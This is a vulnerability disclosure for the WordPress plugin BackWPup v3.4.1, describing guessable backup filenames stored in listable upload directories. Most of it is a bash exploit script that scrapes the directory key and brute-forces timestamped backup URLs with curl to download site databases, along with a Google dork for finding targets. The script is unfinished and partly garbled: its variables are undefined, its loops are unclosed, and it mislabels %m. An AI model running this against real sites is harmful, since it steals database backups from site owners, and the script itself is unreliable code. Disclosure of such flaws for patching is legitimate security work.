Title:Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
There is a weakness in the way backwpup creates and stores the backup files it generates.  It creates a random string to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp.  It would take a Maximum of 86400 tries to guess if a backup is available for that day.  
Filename format: 
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second


I have an exploit available if you're interested.
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup

#Add banner about vulnerability

KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

#Add error checking here
echo "[+] Getting Unique Key $KEY"
echo "[+] Checking directory $DIR"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day

echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
        for x in `seq -w 0 59`; do
                 Y=`echo "scale=2;($Z/86000)*100"|bc`;
                 echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
        for z in `seq -w 0 59`; do
                 Z=$(( $Z + 1 ));
                 RESULT=`curl -s --head $CWPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo ""
                 echo "[+] Location $CWPATH Found";
                 echo "[+] Received $RESULT";
                 echo "Downloading......";
                # wget $CWPATH
echo "Completed."